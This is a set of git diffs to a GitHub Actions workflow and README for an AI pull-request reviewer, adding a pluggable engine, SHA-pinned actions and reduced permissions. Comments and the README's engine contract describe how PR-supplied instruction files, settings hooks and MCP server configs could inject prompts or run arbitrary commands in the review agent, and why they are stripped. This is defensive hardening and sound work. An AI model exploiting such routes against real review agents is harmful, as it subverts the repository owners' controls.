+| `base_url` sent | proxy origin **+ `/v1`** | proxy origin, **`/v1` stripped** |
+| Tools granted | `Read`, `Write`, `Grep`, `Glob` | `Read`, `Write` |
+| Shell | none (absent from `enabled` **and** denied by rule) | none (`--allowedTools` omits Bash) |
+| Config stripped | `CLAUDE.md`, `AGENTS.md`, `KIMI.md`, `.kimi-code/` | `CLAUDE.md`, `CLAUDE.local.md`, `AGENTS.md`, `.mcp.json`, `.claude/`, `.claude-plugin/` |
+| Applicable inputs | all, incl. `max_context_size`, `cli_version` | all except `max_context_size`, `cli_version` |
+| `agent` reported | `ai_review` | `claude_review` |
+| Artifact | `ai-review-summary-*` | `claude-review-summary-*` |
+
+**On the `/v1` asymmetry:** `base_url` is one engine-neutral input. The Kimi CLI
+wants a `/v1` suffix; the Anthropic SDK appends `/v1/messages` itself and must not
+receive one. Each engine normalises the value it is given, so the same
+`base_url` works across engines and flipping `engine` never silently 404s. Do
+not "fix" this by giving the dispatch per-engine defaults — that would make one
+input value mean two different things.
+
+**A model swap is config; an engine swap is a rewrite.** Any model the LiteLLM
+proxy fronts can be reached by setting `model` (and `max_context_size` on Kimi).
+Replacing an engine's *CLI* means writing a new composite action, because each
+CLI has its own config format, sandbox model, tool names and entrypoint.
+
+## Inputs
+
+| Input | Description | Required | Default |
+|-------|-------------|----------|---------|
+| `engine` | `kimi` or `anthropic` | ❌ | `kimi` |
+| `model` | Model ID; resolved per engine when empty | ❌ | `""` |
+| `base_url` | LLM API endpoint; `/v1` added or stripped per engine | ❌ | `https://litellmsa.deriv.ai/v1` |
+| `max_context_size` | **[kimi]** Context window in tokens. Must match the model, or the CLI over-packs and the API rejects the request | ❌ | `1048576` |
+| `cli_version` | **[kimi]** Exact `@moonshot-ai/kimi-code` version | ❌ | `0.34.0` |
+| `legacy_markers` | Newline-separated markers from superseded workflows to also delete | ❌ | `Claude PR Review Complete` |
+| `prompt_gist_url` | Review prompt template | ❌ | DerivFE gist |
+
+Inputs marked **[kimi]** are ignored by other engines.
+
+`cli_version` is pinned deliberately: `@moonshot-ai/kimi-code` is pre-1.0 and
+ships minor releases weekly, so `latest` would pull both breaking changes and
+unreviewed code into a job holding `LLM_API_KEY` and a write-scoped
+`GITHUB_TOKEN`. Bump it by PR. The Anthropic engine's action SHA is pinned the
+same way but *inside* the action, because `uses:` accepts no expressions.
+
+## Secrets
+
+| Secret | Description | Required |
+|--------|-------------|----------|
+| `LLM_API_KEY` | LiteLLM virtual key (or a Kimi Console key with the direct endpoint). The same value serves every engine | ✅ |
+| `AGENT_METRICS_API_URL` | Metrics dashboard base URL. Unset = skip POSTing | ❌ |
+| `AGENT_METRICS_API_KEY` | Dashboard auth; required when the URL is set | ❌ |
+
+The left-hand side is *this workflow's* parameter name and the right-hand side is
+your repo's secret, so migrating from `claude-pr-review.yml` needs no new secret:
+`LLM_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}` works as-is, because that value
+is already a LiteLLM virtual key.
+
+## Permissions
+
+`actions: write` is currently declared but believed unnecessary — `git blame`
+shows it was escalated from `read` alongside an `upload-artifact` change, and
+`upload-artifact` authenticates with `ACTIONS_RUNTIME_TOKEN` rather than this
+token. It is retained only so no existing consumer breaks mid-migration. When
+removing it: **drop it from this workflow first, then from the callers.** The
+reverse order fails every run, because a caller granting less than the called
+workflow declares is rejected outright.
+
+`id-token: write` also appears unused and is a candidate for the same treatment.
+
+## Comment markers and cleanup
+
+Each run deletes prior review comments before posting, so a PR carries exactly
+one. Detection uses a canonical hidden marker, `<!-- deriv-pr-review -->`, which
+the **post step appends** — it is not something the model is asked to emit.
+Earlier versions depended on the model reproducing a visible header, which meant
+one reworded header left a duplicate comment on the PR forever.
+
+`legacy_markers` exists purely for migrations: a run also deletes comments
+matching those strings, so a PR that has been through more than one review
+workflow does not accumulate one orphan per workflow.
+
+> **When may the `legacy_markers` default be emptied?**
+> Only once no open PR anywhere in the org can still carry a
+> `Claude PR Review Complete` comment — i.e. every consumer has been migrated
+> **and** every PR that was open during the migration has closed. Allow 90 days
+> minimum. Emptying it early resurrects duplicate comments on long-lived PRs.
+
+## Metrics
+
+Events go to `${AGENT_METRICS_API_URL}/api/v1/events`, and always to the job
+summary regardless of dashboard state:
+
+```json
+{
+  "agent": "ai_review",
+  "event_type": "initial_review | followup_review",
+  "timestamp": "…", "pr_number": "…", "repo": "…",
+  "payload": { "commit_sha": "…", "review_size_bytes": 0, "model": "k3", "engine": "kimi" }
+}
+```
+
+`agent` is pinned per engine so migrating a repo onto this workflow keeps feeding
+the dashboard series it already had. `payload.engine` is the durable dimension
+for telling engines apart — prefer grouping on it over reading `agent`.
+
+## Migrating from `claude-pr-review.yml`
+
+`claude-pr-review.yml` is **deprecated** and now delegates here. It will be
+deleted; see the deprecation ledger in the repo README. To migrate a consumer,
+edit its caller (three changes — `uses:`, `with:`, and the secret *parameter*
+name):
+
+```diff
+-    uses: deriv-com/shared-actions/.github/workflows/claude-pr-review.yml@master
++    uses: deriv-com/shared-actions/.github/workflows/ai-pr-review.yml@master
+     permissions:
+       contents: read
+       pull-requests: write
+       issues: write
+       id-token: write
+       actions: write
++    with:
++      engine: anthropic          # explicit — the default is kimi
+     secrets:
+-      ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
++      LLM_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
+       AGENT_METRICS_API_URL: ${{ secrets.AGENT_METRICS_API_URL }}
+       AGENT_METRICS_API_KEY: ${{ secrets.AGENT_METRICS_API_KEY }}
+```
+
+Keep the caller's filename, `name:` and job id — they determine the status-check
+name, and changing one can block merges on a repo with branch protection. Do
+cosmetic renames separately, after auditing required checks.
+
+Switching that repo to Kimi afterwards is a separate decision: set
+`engine: kimi`, drop `max_context_size` if the model's window differs, and expect
+review prose to change. Compare quality on real PRs before rolling it out.
+
+## Adding an engine
+
+Exactly three edits:
+
+1. **`.github/actions/ai_review_engine_<name>/action.yml`** — satisfy the engine
+   contract (below).
+2. **A `case` arm** in `Resolve and validate engine` — the enum plus the engine's
+   default model, metrics agent and artifact prefix.
+3. **An `if:`-gated step** in the `ENGINE DISPATCH` block. `uses:` accepts no
+   expressions, so dispatch cannot be one dynamic step.
+
+### The contract
+
+The workflow guarantees the PR head is checked out, that
+`/tmp/review_context.md` and `/tmp/pr_diff.txt` exist and are non-empty, and that
+the access gate has passed.
+
+An engine **must** strip PR-supplied agent config as its *first* step, grant the
+model no shell tool, read the context and diff, write the review to
+`output_path`, and fail with an engine-named message if it wrote nothing. It
+**must not** post PR comments, reach the GitHub API on the model's behalf, or
+assume it owns checkout, prompt fetch, previous-review handling, context build,
+diff fetch, comment posting, metrics or artifacts.
+
+The stripping step is a **security boundary, and its paths are engine-specific**
+— `.claude/settings.json` can declare hooks that execute arbitrary commands and
+`.kimi-code/mcp.json` can declare MCP servers, neither gated by a tool allowlist,
+and both PR-controlled. Never inherit another engine's list; work out what your
+CLI reads.
+
+### Gotchas that will bite you
+
+- **`uses:` takes no expressions**, in workflows *or* composite actions. That is
+  why dispatch is N gated steps and why the Anthropic action's SHA is literal.
+- **A local `./.github/actions/…` path resolves against the *caller's* repo**
+  inside a reusable workflow, so engines must be referenced as
+  `deriv-com/shared-actions/.github/actions/<name>@master`.
+- **Composite refs resolve `@master` even from a PR branch.** To test an engine
+  change before merge, temporarily point the dispatch `uses:` at `@<branch>` and
+  revert before merging. Merge a *new* engine while nothing references it.
+- **`secrets` is unreadable inside a composite action** — pass credentials as
+  inputs. `${{ github.token }}` *is* reachable.
+- **`timeout-minutes` is invalid on steps inside a composite action.** It lives
+  on the dispatch step in the workflow.
+- **All steps in a composite action share one log group**, so failures must name
+  the engine or they are unattributable.
+- **`actionlint` does not validate composite actions**, only `.github/workflows/`.
+  Lint action files with `yaml-lint` and review them by hand.
+
+## How It Works
+
+1. **Access gate** — actor must be a `deriv-com` member or a repo collaborator.
+2. **Resolve engine** — validate `engine`, resolve per-engine defaults.
+3. **Checkout** PR head (depth 20, for the incremental diff).
+4. **Fetch prompt** template from the gist; inject the Click2Fix URL.
+5. **Capture and delete** prior review comments (canonical + legacy markers,
+   paginated), keeping the newest as `PREVIOUS_REVIEW` and extracting its
+   `reviewed-commit` SHA.
+6. **Collect acknowledged suggestions** from `Click2Fix - Acknowledge` comments.
+7. **Build `/tmp/review_context.md`** — instructions, previous review,
+   noise-filtered incremental diff, acknowledged items, PR metadata, output format.
+8. **Pre-fetch the diff** to `/tmp/pr_diff.txt` with the trusted token, so the
+   engine needs no shell.
+9. **Dispatch to the engine** — it writes `/tmp/ai_review_output.txt`.
+10. **Post** exactly one comment, appending the detection markers.
+11. **Emit metrics** to the dashboard and the job summary; upload the payload.

--- a/.github/workflows/AI_PR_REVIEW_README.md
+++ b/.github/workflows/AI_PR_REVIEW_README.md
@@ -209,10 +209,11 @@ for telling engines apart — prefer grouping on it over reading `agent`.
 
 ## Migrating from `claude-pr-review.yml`
 
-`claude-pr-review.yml` is **deprecated** and now delegates here. It will be
-deleted; see the deprecation ledger in the repo README. To migrate a consumer,
-edit its caller (three changes — `uses:`, `with:`, and the secret *parameter*
-name):
+`claude-pr-review.yml` is **deprecated**. It is still its own standalone
+implementation for now — converting it into a thin shim that delegates here is a
+tracked follow-up, after which it will be deleted. See the deprecation ledger in
+the repo README. To migrate a consumer, edit its caller (three changes —
+`uses:`, `with:`, and the secret *parameter* name):
 
 ```diff
 -    uses: deriv-com/shared-actions/.github/workflows/claude-pr-review.yml@master

--- a/.github/workflows/DEPENDONME_BOT_README.md
+++ b/.github/workflows/DEPENDONME_BOT_README.md
@@ -34,7 +34,7 @@ on:
 
 jobs:
   fix-vulnerabilities:
-    uses: deriv-com/shared-action/.github/workflows/dependonme-bot.yml@<commit-hash> # pin to specific version
+    uses: deriv-com/shared-actions/.github/workflows/dependonme-bot.yml@<commit-hash> # pin to specific version
     with:
       slack_users_to_tag: 'U12345678,U87654321'
       base_branch: 'master'

--- a/.github/workflows/ai-pr-review.yml
+++ b/.github/workflows/ai-pr-review.yml
@@ -282,7 +282,12 @@ jobs:
           echo "📋 Review context built ($(wc -c < /tmp/review_context.md) bytes)"
 
       - name: Remove agent config files to prevent project config leaking into review
-        run: rm -f CLAUDE.md AGENTS.md
+        # .kimi-code/ is removed because project-level .kimi-code/mcp.json can declare
+        # MCP servers (arbitrary local commands) and .kimi-code/local.toml can widen
+        # workspace access — a PR must not be able to alter the review agent's runtime.
+        run: |
+          rm -f CLAUDE.md AGENTS.md KIMI.md
+          rm -rf .kimi-code
 
       # ======================= ENGINE: Kimi Code CLI =======================
       # Everything below (install, configure, run) is the swappable engine.
@@ -312,13 +317,25 @@ jobs:
           # Model + provider are defined entirely through the KIMI_MODEL_* env channel
           # on the run step (no credentials written to disk); this config file only
           # restricts the tool surface:
-          #   Read, Write, Bash(gh pr diff:*), Bash(gh pr view:*)
+          #   Read, Write(/tmp only), Bash(gh pr diff:*), Bash(gh pr view:*)
           # Grep/Glob stay available as read-only exploration helpers.
           cat > "$HOME/.kimi-code/config.toml" <<'EOF'
           default_permission_mode = "auto"
 
           [tools]
           enabled = ["Read", "Write", "Bash", "Grep", "Glob"]
+
+          # Rules are matched first-match-wins, before the mode default applies.
+          # Write is allowed only under /tmp (review output); everything else is
+          # denied so the agent cannot modify the checkout. Bash is pinned to the
+          # two read-only gh commands the review needs.
+          [[permission.rules]]
+          decision = "allow"
+          pattern = "Write(/tmp/*)"
+
+          [[permission.rules]]
+          decision = "deny"
+          pattern = "Write"
 
           [[permission.rules]]
           decision = "allow"

--- a/.github/workflows/ai-pr-review.yml
+++ b/.github/workflows/ai-pr-review.yml
@@ -78,21 +78,22 @@ jobs:
     if: github.event.pull_request.draft == false
 
     permissions:
+      # `actions:` is deliberately absent. Permissions can only be reduced, never
+      # elevated, down a reusable-workflow chain, so declaring less than a caller
+      # grants is always safe — a caller may keep granting `actions: write` and
+      # this job simply will not receive it. Nothing to migrate.
+      #
+      # It is also unused: `git log -S "actions: write"` shows one commit,
+      # af32344 "chore: add artifact", which escalated actions:read -> write
+      # alongside upload-artifact — and upload-artifact authenticates with
+      # ACTIONS_RUNTIME_TOKEN, not this token. Neither engine calls the Actions
+      # API, and claude-code-action's docs at the pinned SHA ask for
+      # `actions: read` only, for the opt-in CI-log feature we do not enable.
+      # If the Anthropic engine ever needs it, add `actions: read` — not write.
       contents: read
       pull-requests: write
       issues: write
       id-token: write
-      # PROVISIONAL — carried over from claude-pr-review.yml so no consumer breaks
-      # mid-migration. A reusable workflow may not request more than its caller
-      # grants, and all 14 current callers already grant this, so it is free
-      # today. Evidence says it is unnecessary: `git log -S "actions: write"`
-      # shows one commit, af32344 "chore: add artifact", which escalated
-      # actions:read -> write alongside upload-artifact — and upload-artifact
-      # authenticates with ACTIONS_RUNTIME_TOKEN, not this token. Neither engine
-      # calls the Actions API, and claude-code-action's docs at the pinned SHA
-      # ask for `actions: read` only, for an opt-in feature we do not enable.
-      # Confirm on the first dogfood run, then drop it HERE FIRST, callers after.
-      actions: write
 
     concurrency:
       group: ai-pr-review-${{ github.event.pull_request.number }}

--- a/.github/workflows/ai-pr-review.yml
+++ b/.github/workflows/ai-pr-review.yml
@@ -1,31 +1,45 @@
 name: AI PR Review
 
-# LLM-agnostic PR review workflow.
-# The public interface (inputs, secrets, review marker, metrics event) is engine-neutral
-# so the underlying LLM engine can be swapped later. The current engine is Kimi Code CLI
-# (Kimi K3) — see the clearly-marked "engine" steps below. To substitute a different
-# engine, replace those steps and keep everything else unchanged.
+# AI PR review workflow. Current engine: Kimi Code CLI (Kimi K3), reached through
+# the Deriv LiteLLM proxy.
+#
+# Two kinds of "swap" are possible here, and they are NOT equally cheap:
+#
+#   Model swap — cheap, supported. Any model the LiteLLM proxy fronts can be used
+#   via the `model` / `base_url` inputs; the proxy normalises the API.
+#
+#   Engine swap — a rewrite, not a config change. Replacing the Kimi CLI with a
+#   different agentic CLI (Codex, Claude Code, ...) means rewriting every step in
+#   the marked ENGINE section below: each CLI has its own config format,
+#   sandbox/permission model, tool names and non-interactive entrypoint, and its
+#   own set of PR-supplied config files that must be stripped first.
+#
+# The scaffolding outside the ENGINE section (access gate, prompt fetch, previous
+# review handling, context build, comment posting, metrics) is genuinely reusable
+# across engines. The ENGINE section is not portable — do not assume otherwise.
+#
+# Inputs tagged [engine-specific] apply only to the current engine.
 
 on:
   workflow_call:
     inputs:
       model:
-        description: "Model ID to use for review (engine-specific; for the Kimi engine: k3, k3-256k, kimi-for-coding, kimi-for-coding-highspeed)"
+        description: "[engine-specific] Model ID to use for review. Kimi engine: k3, k3-256k, kimi-for-coding, kimi-for-coding-highspeed. Any model fronted by the LiteLLM proxy also works."
         required: false
         default: "k3"
         type: string
       base_url:
-        description: "Base URL of the LLM API endpoint (default is the Deriv LiteLLM proxy; use https://api.kimi.com/coding/v1 for direct Kimi Code platform access)"
+        description: "[engine-specific] Base URL of the LLM API endpoint. Default is the Deriv LiteLLM proxy; use https://api.kimi.com/coding/v1 for direct Kimi Code platform access."
         required: false
         default: "https://litellmsa.deriv.ai/v1"
         type: string
       max_context_size:
-        description: "Maximum context window in tokens for the selected model (k3 = 1048576, k3-256k / kimi-for-coding = 262144)"
+        description: "[engine-specific] Maximum context window in tokens (k3 = 1048576, k3-256k / kimi-for-coding = 262144). Maps to KIMI_MODEL_MAX_CONTEXT_SIZE and has no equivalent on other engines — ignored if the engine is swapped."
         required: false
         default: "1048576"
         type: string
       cli_version:
-        description: "Version of the review CLI to install (npm dist-tag or version; engine-specific)"
+        description: "[engine-specific] Version of the review CLI to install (npm dist-tag or version)."
         required: false
         default: "latest"
         type: string
@@ -281,22 +295,30 @@ jobs:
 
           echo "📋 Review context built ($(wc -c < /tmp/review_context.md) bytes)"
 
-      - name: Remove agent config files to prevent project config leaking into review
-        # .kimi-code/ is removed because project-level .kimi-code/mcp.json can declare
-        # MCP servers (arbitrary local commands) and .kimi-code/local.toml can widen
-        # workspace access — a PR must not be able to alter the review agent's runtime.
+      # ======================= ENGINE: Kimi Code CLI =======================
+      # Everything below (strip config, install, configure, run) is the engine.
+      # Replacing it is a rewrite of all four steps, not a config change.
+      #
+      # Contract any replacement engine MUST satisfy:
+      #   - strips every file in the checkout that the PR could use to alter the
+      #     engine's runtime BEFORE the engine starts: context/instruction files,
+      #     permission or sandbox config, and MCP server declarations. This is a
+      #     security boundary, and the file names are engine-specific — e.g.
+      #     Kimi reads .kimi-code/{mcp.json,local.toml}, Codex reads .codex/rules/.
+      #     Do not carry this step over unchanged.
+      #   - reads /tmp/review_context.md and the checked-out PR code
+      #   - writes the final review markdown to /tmp/ai_review_output.txt
+      #   - restricts the agent so it cannot post PR comments itself (the post
+      #     step below guarantees exactly one comment)
+      # ===================================================================
+
+      - name: Strip PR-supplied agent config (Kimi Code)
+        # Instruction files (prompt injection) plus .kimi-code/ — project-level
+        # mcp.json there can declare MCP servers (arbitrary local commands, not
+        # gated by the Bash deny rule) and local.toml can widen workspace access.
         run: |
           rm -f CLAUDE.md AGENTS.md KIMI.md
           rm -rf .kimi-code
-
-      # ======================= ENGINE: Kimi Code CLI =======================
-      # Everything below (install, configure, run) is the swappable engine.
-      # To substitute a different LLM engine, replace these three steps with
-      # the equivalent install/configure/run for that engine. Contract:
-      #   - reads /tmp/review_context.md and the checked-out PR code
-      #   - writes the final review markdown to /tmp/ai_review_output.txt
-      #   - does NOT post PR comments itself
-      # ===================================================================
 
       - name: Set up Node.js
         uses: actions/setup-node@v4

--- a/.github/workflows/ai-pr-review.yml
+++ b/.github/workflows/ai-pr-review.yml
@@ -100,7 +100,11 @@ jobs:
           echo "❌ Access denied for user: $ACTOR" && exit 1
 
       - name: Checkout PR head
-        uses: actions/checkout@v6
+        # Third-party actions are pinned to a commit SHA, not a tag: tags are
+        # mutable, so `@v6` would let a retagged release execute in a job holding
+        # LLM_API_KEY and a write-scoped GITHUB_TOKEN. Same reasoning as the
+        # pinned cli_version. Bump deliberately via PR.
+        uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6.1.0
         with:
           repository: ${{ github.event.pull_request.head.repo.full_name }}
           ref: ${{ github.event.pull_request.head.ref }}
@@ -340,7 +344,7 @@ jobs:
           rm -rf .kimi-code
 
       - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0
         with:
           node-version: 22
 
@@ -530,7 +534,7 @@ jobs:
 
       - name: Upload review summary as artifact
         if: always()
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2
         with:
           name: ai-review-summary-${{ github.run_id }}
           path: click2fix-payload.json

--- a/.github/workflows/ai-pr-review.yml
+++ b/.github/workflows/ai-pr-review.yml
@@ -1,47 +1,59 @@
 name: AI PR Review
 
-# AI PR review workflow. Current engine: Kimi Code CLI (Kimi K3), reached through
-# the Deriv LiteLLM proxy.
+# AI PR review workflow. The LLM engine is pluggable via the `engine` input.
+# Full docs: .github/workflows/AI_PR_REVIEW_README.md
 #
-# Two kinds of "swap" are possible here, and they are NOT equally cheap:
+#   Model swap — set `model` (and `max_context_size` on the Kimi engine). Any
+#   model the LiteLLM proxy fronts works; the proxy normalises the API.
 #
-#   Model swap — cheap, supported. Any model the LiteLLM proxy fronts can be used
-#   via the `model` / `base_url` inputs; the proxy normalises the API.
+#   Engine swap — set `engine`. Each engine is a composite action under
+#   .github/actions/ai_review_engine_<engine>/ owning its own CLI, sandbox model,
+#   tool restrictions and PR-supplied-config stripping.
 #
-#   Engine swap — a rewrite, not a config change. Replacing the Kimi CLI with a
-#   different agentic CLI (Codex, Claude Code, ...) means rewriting every step in
-#   the marked ENGINE section below: each CLI has its own config format,
-#   sandbox/permission model, tool names and non-interactive entrypoint, and its
-#   own set of PR-supplied config files that must be stripped first.
+# Adding an engine is exactly 3 edits:
+#   1. .github/actions/ai_review_engine_<name>/action.yml   (the engine contract)
+#   2. a `case` arm in "Resolve and validate engine" below  (enum + defaults)
+#   3. an `if:`-gated step in the ENGINE DISPATCH block      (`uses:` takes no
+#      expressions, so dispatch cannot be a single dynamic step)
 #
-# The scaffolding outside the ENGINE section (access gate, prompt fetch, previous
-# review handling, context build, comment posting, metrics) is genuinely reusable
-# across engines. The ENGINE section is not portable — do not assume otherwise.
+# Everything outside ENGINE DISPATCH is engine-neutral scaffolding: access gate,
+# prompt fetch, previous-review capture/cleanup, context build, diff pre-fetch,
+# comment posting, metrics. Engines never touch those concerns.
 #
-# Inputs tagged [engine-specific] apply only to the current engine.
+# Inputs tagged [engine-specific] apply to some engines only.
 
 on:
   workflow_call:
     inputs:
-      model:
-        description: "[engine-specific] Model ID to use for review. Kimi engine: k3, k3-256k, kimi-for-coding, kimi-for-coding-highspeed. Any model fronted by the LiteLLM proxy also works."
+      engine:
+        description: "Review engine: `kimi` (Kimi Code CLI) or `anthropic` (Claude Code Action). Each is a composite action under .github/actions/ai_review_engine_<engine>/. Set this explicitly — the default is `kimi`, so an omitted value on a repo migrating from claude-pr-review.yml would switch LLM vendor."
         required: false
-        default: "k3"
+        default: "kimi"
+        type: string
+      model:
+        description: "Model ID to use for review. Defaults per engine (kimi -> k3, anthropic -> claude-sonnet-5). Any model the LiteLLM proxy fronts works."
+        required: false
+        default: ""
         type: string
       base_url:
-        description: "[engine-specific] Base URL of the LLM API endpoint. Default is the Deriv LiteLLM proxy; use https://api.kimi.com/coding/v1 for direct Kimi Code platform access."
+        description: "Base URL of the LLM API endpoint. Engine-neutral: a trailing /v1 is added or removed as each engine requires, so the same value works across engines. Use https://api.kimi.com/coding/v1 for direct Kimi Code platform access."
         required: false
         default: "https://litellmsa.deriv.ai/v1"
         type: string
       max_context_size:
-        description: "[engine-specific] Maximum context window in tokens (k3 = 1048576, k3-256k / kimi-for-coding = 262144). Maps to KIMI_MODEL_MAX_CONTEXT_SIZE and has no equivalent on other engines — ignored if the engine is swapped."
+        description: "[engine-specific: kimi] Maximum context window in tokens (k3 = 1048576, k3-256k / kimi-for-coding = 262144). Must match the model or the CLI over-packs context and the API rejects the request. Ignored when engine is not `kimi`."
         required: false
         default: "1048576"
         type: string
       cli_version:
-        description: "[engine-specific] Exact version of the review CLI to install. Pinned deliberately — @moonshot-ai/kimi-code is pre-1.0 and ships minor releases weekly, so `latest` risks both breaking changes and unreviewed code in a privileged job. Bump via PR."
+        description: "[engine-specific: kimi] Exact @moonshot-ai/kimi-code version to install. Pinned deliberately — the package is pre-1.0 and ships minor releases weekly, so `latest` risks both breaking changes and unreviewed code in a privileged job. Bump via PR. Ignored when engine is not `kimi`."
         required: false
         default: "0.34.0"
+        type: string
+      legacy_markers:
+        description: "Newline-separated comment markers from superseded review workflows that this run should ALSO delete, so a PR does not accumulate one stale review comment per workflow it has been through. Empty this only once no open PR org-wide can still carry a pre-migration comment — see AI_PR_REVIEW_README.md."
+        required: false
+        default: "Claude PR Review Complete"
         type: string
       prompt_gist_url:
         description: "URL to fetch prompt template from"
@@ -50,7 +62,7 @@ on:
         type: string
     secrets:
       LLM_API_KEY:
-        description: "API key for the LLM engine (with the default LiteLLM base_url: a LiteLLM virtual key; with the direct Kimi endpoint: a Kimi Code Console key)"
+        description: "API key for the LLM engine (with the default LiteLLM base_url: a LiteLLM virtual key; with the direct Kimi endpoint: a Kimi Code Console key). The same value serves every engine."
         required: true
       AGENT_METRICS_API_URL:
         description: "Base URL for the OneAboveAll metrics dashboard API (e.g. https://dashboard.example.com). Leave unset to skip POSTing events."
@@ -66,20 +78,31 @@ jobs:
     if: github.event.pull_request.draft == false
 
     permissions:
-      # No step calls the Actions API, so `actions: write` is deliberately absent
-      # (the sibling claude-pr-review.yml grants it for claude-code-action's
-      # internals). upload-artifact uses ACTIONS_RUNTIME_TOKEN, not this token.
       contents: read
       pull-requests: write
       issues: write
       id-token: write
+      # PROVISIONAL — carried over from claude-pr-review.yml so no consumer breaks
+      # mid-migration. A reusable workflow may not request more than its caller
+      # grants, and all 14 current callers already grant this, so it is free
+      # today. Evidence says it is unnecessary: `git log -S "actions: write"`
+      # shows one commit, af32344 "chore: add artifact", which escalated
+      # actions:read -> write alongside upload-artifact — and upload-artifact
+      # authenticates with ACTIONS_RUNTIME_TOKEN, not this token. Neither engine
+      # calls the Actions API, and claude-code-action's docs at the pinned SHA
+      # ask for `actions: read` only, for an opt-in feature we do not enable.
+      # Confirm on the first dogfood run, then drop it HERE FIRST, callers after.
+      actions: write
 
     concurrency:
       group: ai-pr-review-${{ github.event.pull_request.number }}
       cancel-in-progress: true
 
     env:
-      REVIEW_MODEL: ${{ inputs.model || 'k3' }}
+      # Single source of truth for the review file both the engine and the post
+      # step touch. REVIEW_MODEL is NOT here — it depends on `engine`, so the
+      # "Resolve and validate engine" step writes it to $GITHUB_ENV.
+      REVIEW_OUTPUT_FILE: /tmp/ai_review_output.txt
 
     steps:
       - name: Security Check - Validate User Access
@@ -98,6 +121,64 @@ jobs:
           [[ "$COLLAB" == "204" ]] && echo "✅ Verified collaborator" && exit 0
 
           echo "❌ Access denied for user: $ACTOR" && exit 1
+
+      - name: Resolve and validate engine
+        id: engine
+        env:
+          ENGINE_INPUT: ${{ inputs.engine }}
+          MODEL_INPUT: ${{ inputs.model }}
+        run: |
+          ENGINE="${ENGINE_INPUT:-kimi}"
+
+          # Single source of truth for the engine enum and its per-engine
+          # defaults. Every value accepted here MUST have a matching if-gated
+          # step in ENGINE DISPATCH below, and vice versa.
+          #
+          # Validating up front is what makes the dispatch block provably
+          # exhaustive: without it an unknown engine silently matches no gate and
+          # the run fails minutes later at "Post review" with "review file
+          # missing", which reads like an engine crash rather than a caller typo.
+          #
+          # metrics_agent is pinned per engine so migrating a repo onto this
+          # workflow is invisible to the dashboard, and a later engine switch
+          # shows up as a deliberate new series rather than a silent shift.
+          # ARTIFACT_PREFIX is pinned per engine for the same reason: the artifact
+          # name is a public interface that something outside this repo may poll,
+          # so routing a repo onto this workflow must not rename it.
+          case "$ENGINE" in
+            kimi)
+              DEFAULT_MODEL="k3"
+              METRICS_AGENT="ai_review"
+              ARTIFACT_PREFIX="ai-review"
+              ;;
+            anthropic)
+              DEFAULT_MODEL="claude-sonnet-5"
+              METRICS_AGENT="claude_review"
+              ARTIFACT_PREFIX="claude-review"
+              ;;
+            *)
+              echo "❌ Unknown engine: '$ENGINE'"
+              echo "   Supported values for the \`engine\` input: kimi, anthropic"
+              exit 1
+              ;;
+          esac
+
+          MODEL="${MODEL_INPUT:-$DEFAULT_MODEL}"
+
+          echo "engine=$ENGINE" >> "$GITHUB_OUTPUT"
+          echo "model=$MODEL" >> "$GITHUB_OUTPUT"
+          echo "artifact_prefix=$ARTIFACT_PREFIX" >> "$GITHUB_OUTPUT"
+
+          # Consumed by later `run:` scripts (review header, metrics payload,
+          # step summary) rather than by `if:`, so $GITHUB_ENV is fine here.
+          # Dispatch gates read steps.engine.outputs.engine instead.
+          {
+            echo "REVIEW_MODEL=$MODEL"
+            echo "REVIEW_ENGINE=$ENGINE"
+            echo "METRICS_AGENT=$METRICS_AGENT"
+          } >> "$GITHUB_ENV"
+
+          echo "✅ Engine: $ENGINE | Model: $MODEL | Metrics agent: $METRICS_AGENT"
 
       - name: Checkout PR head
         # Third-party actions are pinned to a commit SHA, not a tag: tags are
@@ -128,31 +209,59 @@ jobs:
         id: previous-review
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          # Canonical marker first — appended deterministically by the post step,
+          # so detection no longer depends on the model reproducing a visible
+          # header. Legacy markers let this run also reap comments left by
+          # workflows it supersedes; without them a PR open across a migration
+          # keeps one orphaned review comment per workflow, forever.
+          REVIEW_MARKERS: |
+            <!-- deriv-pr-review -->
+            AI PR Review Complete
+            ${{ inputs.legacy_markers }}
         run: |
           REPO="${{ github.repository }}"
           PR_NUMBER="${{ github.event.pull_request.number }}"
 
-          # Capture previous review before deleting
-          PREVIOUS=$(gh api "repos/${REPO}/issues/${PR_NUMBER}/comments" \
-            --jq '.[] | select(.user.login == "github-actions[bot]" and (.body | contains("AI PR Review Complete"))) | .body' 2>/dev/null || echo "")
+          # --paginate: the default page size is 30, so the previous single-call
+          # version silently missed review comments on busy PRs and left
+          # duplicates behind. Fetch once, filter locally, reuse for the delete.
+          # `jq -s add` merges the per-page arrays --paginate concatenates (do not
+          # use `--jq` with a whole-array filter — it applies per page).
+          gh api "repos/${REPO}/issues/${PR_NUMBER}/comments" --paginate \
+            | jq -s 'add' > /tmp/all_comments.json
 
-          if [ -n "$PREVIOUS" ]; then
-            echo "$PREVIOUS" > /tmp/previous_review.txt
-            echo "has_previous=true" >> $GITHUB_OUTPUT
+          # Substring matching, not regex, so marker content needs no escaping.
+          FILTER='
+            ($ENV.REVIEW_MARKERS | split("\n") | map(select(length > 0))) as $markers
+            | map(select(
+                .user.login == "github-actions[bot]"
+                and (.body as $b | any($markers[]; $b | contains(.)))
+              ))
+            | sort_by(.created_at)
+          '
 
-            # Extract the last reviewed commit SHA from the previous review metadata
-            LAST_REVIEWED_SHA=$(echo "$PREVIOUS" | grep -oP '(?<=<!-- reviewed-commit: )[a-f0-9]+(?= -->)' || echo "")
-            echo "last_reviewed_sha=$LAST_REVIEWED_SHA" >> $GITHUB_OUTPUT
+          # `last` — newest match only. A PR that crossed a migration legitimately
+          # holds two matching comments; concatenating them produced a MULTI-LINE
+          # last_reviewed_sha, which corrupts $GITHUB_OUTPUT.
+          jq -r "$FILTER | last | .body // empty" /tmp/all_comments.json \
+            > /tmp/previous_review.txt
+
+          if [ -s /tmp/previous_review.txt ]; then
+            echo "has_previous=true" >> "$GITHUB_OUTPUT"
